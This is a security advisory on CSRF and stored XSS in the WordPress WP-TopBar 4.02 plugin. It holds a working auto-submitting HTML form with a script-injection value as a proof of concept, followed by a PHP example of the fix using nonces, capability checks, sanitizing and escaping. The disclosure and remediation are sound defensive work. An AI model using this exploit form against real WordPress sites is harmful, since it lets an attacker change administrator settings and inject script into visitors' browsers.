wordpress plugin WP-TopBar 4.02 CSRF

XSS and CSRF (Cross-Site Request Forgery) vulnerabilities were found in the WordPress WP-TopBar 4.02 plugin: the plugin's settings page accepts a POST without a request token, so a page the logged-in administrator visits can submit attacker-chosen settings, and the submitted bar text is then rendered unescaped.


<html>
<head>
    <title>Download</title>
</head>
<body>
<!-- PoC: auto-submitting form that posts settings to the plugin's admin page -->
<form name="testform" action="https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1" method="POST">
    <br>
    <input type="hidden" name="wptbbartext" value="</script><script>onload=alert(3)</script>">
    <input type="hidden" name="wptblinktext" value="whatever">
    <input type="hidden" name="wptblinkurl" value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F">
    <input type="hidden" name="wptblinktarget" value="blank">
    <input type="hidden" name="wptbenableimage" value="false">
    <input type="hidden" name="wptbbarimage" value="">
    <input type="hidden" name="update_wptbSettings" value="Update+Settings">
</form>
<script type="text/javascript">
    document.testform.submit();
</script>
</body>
</html>
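The fix for both issues, as an added example that is not the plugin's own code: the settings handler verifies a WordPress nonce and the user's capability before saving, sanitizes each of the fields named in the PoC, and escapes the bar text on output. The nonce action/field names, the option key and the function names are assumptions for illustration.

```php
<?php
// Added example (not WP-TopBar's code). Assumed names: nonce action
// 'wptb_update_settings', nonce field 'wptb_nonce', option 'wptb_settings_example'.

// Settings form: wp_nonce_field() emits a token bound to the logged-in user,
// so a form posted from another origin cannot supply a valid one.
function wptb_example_render_form() {
    $opts = get_option( 'wptb_settings_example', array() );
    $url  = admin_url( 'admin.php?page=wp-topbar.php&action=topbartext&barid=1' );
    echo '<form method="post" action="' . esc_url( $url ) . '">';
    wp_nonce_field( 'wptb_update_settings', 'wptb_nonce' );
    echo '<input type="text" name="wptbbartext" value="' . esc_attr( $opts['bartext'] ?? '' ) . '">';
    echo '<input type="text" name="wptblinktext" value="' . esc_attr( $opts['linktext'] ?? '' ) . '">';
    echo '<input type="text" name="wptblinkurl" value="' . esc_attr( $opts['linkurl'] ?? '' ) . '">';
    echo '<input type="submit" name="update_wptbSettings" value="Update Settings">';
    echo '</form>';
}

// Save handler: capability check, then nonce check, then sanitize every field.
function wptb_example_save_settings() {
    if ( ! isset( $_POST['update_wptbSettings'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Dies with "Are you sure?" when the nonce is missing, stale or forged.
    check_admin_referer( 'wptb_update_settings', 'wptb_nonce' );

    $opts = array(
        'bartext'     => sanitize_text_field( wp_unslash( $_POST['wptbbartext'] ?? '' ) ),
        'linktext'    => sanitize_text_field( wp_unslash( $_POST['wptblinktext'] ?? '' ) ),
        'linkurl'     => esc_url_raw( wp_unslash( $_POST['wptblinkurl'] ?? '' ) ),
        'linktarget'  => ( ( $_POST['wptblinktarget'] ?? '' ) === 'blank' ) ? 'blank' : 'self',
        'enableimage' => ( ( $_POST['wptbenableimage'] ?? 'false' ) === 'true' ),
        'barimage'    => esc_url_raw( wp_unslash( $_POST['wptbbarimage'] ?? '' ) ),
    );
    update_option( 'wptb_settings_example', $opts );
}
add_action( 'admin_init', 'wptb_example_save_settings' );

// Front-end output: escape on the way out, so a stored value such as
// "</script><script>onload=alert(3)</script>" is rendered as literal text.
function wptb_example_render_bar() {
    $opts   = get_option( 'wptb_settings_example', array() );
    $target = ( ( $opts['linktarget'] ?? 'self' ) === 'blank' ) ? ' target="_blank" rel="noopener"' : '';
    echo '<div class="wptb-bar">' . esc_html( $opts['bartext'] ?? '' ) . ' ';
    echo '<a href="' . esc_url( $opts['linkurl'] ?? '' ) . '"' . $target . '>'
       . esc_html( $opts['linktext'] ?? '' ) . '</a></div>';
}
```

A quick check for an affected site is to open the settings page source and confirm the form contains a `_wpnonce`-style hidden field; the PoC above works precisely because no such field is required.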
